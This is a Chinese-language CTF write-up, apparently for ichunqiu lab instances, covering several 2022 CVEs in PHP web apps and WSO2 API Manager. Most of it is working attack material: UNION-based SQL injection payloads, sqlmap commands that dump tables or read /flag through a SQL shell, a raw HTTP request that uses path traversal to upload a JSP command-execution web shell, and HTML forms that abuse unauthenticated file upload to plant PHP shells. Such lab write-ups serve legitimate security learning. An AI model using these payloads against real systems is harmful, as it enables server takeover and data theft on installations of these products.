CVE-2022-32991

这里找一下源码审一下

根据漏洞编号搜到 源码名字

image-20230115222340861

image-20230115222353905

image-20230115222410584

<@urlencode>-60377db362694'<@/urlencode>

image-20230115213445009

image-20230115212910747

60377db362694' or '1

image-20230115213546242

60377db362694' order by 5 -- 
60377db362694' order by 6 --

image-20230115213635326

60377db362694' union select 1,2,3,4,5 --

image-20230115213704382

60377db362694' union select 1,2,(select group_concat(schema_name) from information_schema.schemata),4,5 --

image-20230115214928863

60377db362694' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='flag'),4,5 --

image-20230115215425931

60377db362694' union select 1,2,(select flag from ctf.flag),4,5 --

image-20230115215421361

CVE-2022-30887

image-20230116162156012

image-20230116162235456

搭建起来

image-20230116170609300

找一下用户名和密码

image-20230116170550915

image-20230116170626787

这里也很简单

image-20230116170821250

image-20230116171831259

image-20230116171844754

image-20230116171901114

image-20230116171912135

这里全是 任意文件上传

image-20230116171953767

CVE-2022-29464

https://github.com/wso2/product-apim/releases/tag/v4.0.0

image-20230116195501169

.\api-manager.bat

image-20230116222901140

POST /fileupload/toolsAny HTTP/2
Host: eci-2zebqk49mtyq78wkry75.cloudeci1.ichunqiu.com:9443
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 882
Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0
User-Agent: python-requests/2.22.0


--4ef9f369a86bfaadf5ec3177278d49c0
Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/1.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/1.jsp"

<FORM>
    <INPUT name='cmd' type=text>
    <INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
    <%
    String cmd = request.getParameter("cmd");
    String output = "";
    if(cmd != null) {
        String s = null;
        try {
            Process p = Runtime.getRuntime().exec(cmd,null,null);
            BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
            while((s = sI.readLine()) != null) { output += s+"</br>"; }
        }  catch(IOException e) {   e.printStackTrace();   }
    }
%>
        <%=output %>
--4ef9f369a86bfaadf5ec3177278d49c0--

image-20230116202847100

image-20230116202915376

image-20230116202951988

CVE-2022-28525

image-20230116232055204

image-20230116232511034

image-20230116235842612

move_uploaded_file

看了一下这几个 upload 发现这个是存在未授权 上传的

image-20230117002013377

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>upload</title>
</head>
<body>
<form action="http://eci-2ze3p3ftillcjaoxi4jq.cloudeci1.ichunqiu.com/admin/admin_includes/admin_edit_user.php" method="post" enctype="multipart/form-data">
    <input type="text" name="updateusersubmit" value="123">
    <input type="text" name="user_image" value="new">
    <input type="file" name="new_image"><br>
    <input type="submit" value="上传">

</form>
</body>
</html>

image-20230117002101427

构造一下表单

image-20230117002142479

接着到对应目录访问即可

http://eci-2ze3p3ftillcjaoxi4jq.cloudeci1.ichunqiu.com/admin/images/zf.php

image-20230117002224703

CVE-2022-28512

image-20230117010049685

image-20230117010104490

配置数据库信息的时候可以全局搜索 blog_admin_db

将密码填上

image-20230117191531945

image-20230117184440505

很明显的sql注入

image-20230117193804393

python .\sqlmap.py  --batch -u http://eci-2ze8f6pzti1nb9zy5f57.cloudeci1.ichunqiu.com/single.php?id=5

image-20230117193732861

python .\sqlmap.py  --batch -u http://eci-2ze8f6pzti1nb9zy5f57.cloudeci1.ichunqiu.com/single.php?id=5 --dbs

image-20230117193544675

python .\sqlmap.py  --batch -u http://eci-2ze8f6pzti1nb9zy5f57.cloudeci1.ichunqiu.com/single.php?id=5 -D ctf --tables

image-20230117193620905

python .\sqlmap.py  --batch -u http://eci-2ze8f6pzti1nb9zy5f57.cloudeci1.ichunqiu.com/single.php?id=5 -D ctf -T flag --columns

image-20230117195521827

python .\sqlmap.py  --batch -u http://eci-2ze8f6pzti1nb9zy5f57.cloudeci1.ichunqiu.com/single.php?id=5 -D ctf -T flag -C flag --dump

image-20230117195606487

CVE-2022-28060

image-20230118011646639

image-20230118011658660

image-20230118011708449

明显的注入

image-20230118191506590

这里也是很明显的sql注入 因为正确的写法应该是 

$user_name = mysqli_real_escape_string($con, $user_name);

而这里只是处理了字符没有 应用

image-20230118192826387

这里还有一个文件上传

image-20230118192024783

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>upload</title>
</head>
<body>
<form action="http://stu/admin/includes/admin_add_post.php" method="post" enctype="multipart/form-data">
    <input type="text" name="create_post" value="123">
    <input type="file" name="post_image"><br>
    <input type="submit" value="上传">

</form>
</body>
</html>

image-20230118192101130

python .\sqlmap.py  --batch -r D:\Download\sql.txt --dbs

image-20230118194329594

python .\sqlmap.py  --batch -r D:\Download\sql.txt -D php_cms --tables

image-20230118195001157

没有flag 所以猜猜在文件里

python .\sqlmap.py  --batch -r D:\Download\sql.txt --sql-shell
select load_file('/flag')

image-20230118195726940

CVE-2022-26201

image-20230118011658660

image-20230118011708449

注入挺多的

image-20230118230433411

python .\sqlmap.py  --batch -r D:\Download\sql.txt --dbs

image-20230118230622204

python .\sqlmap.py  --batch -r D:\Download\sql.txt --file-read  "/flag"

image-20230118230656298

CVE-2022-26965

image-20230118200918518

image-20230118200938557

image-20230118215007351

这里很明显文件上传 接着解压

admin 登录进去

image-20230118223006889

将 php压缩一下

image-20230118223057584

http://eci-2zeinn5hdxurnzllfr7s.cloudeci1.ichunqiu.com/data/themes/zf/zf.php

访问即可

image-20230118223129303

CVE-2022-25578

image-20230119170149088

image-20230119170254538

admin tao 默认密码

image-20230119170414046

image-20230119170548516

image-20230119170616878

CVE-2022-25488

image-20230119171427141

image-20230124185510868

image-20230119173719305

很明显的sql注入

python .\sqlmap.py  --batch -u http://eci-2ze34jnwwd2dzf7jz8el.cloudeci1.ichunqiu.com/admin/ajax/avatar.php?id=1 --dbs

image-20230119174011347

python .\sqlmap.py  --batch -u http://eci-2ze34jnwwd2dzf7jz8el.cloudeci1.ichunqiu.com/admin/ajax/avatar.php?id=1 --sql-shell
select load_file('/flag')

image-20230119174027218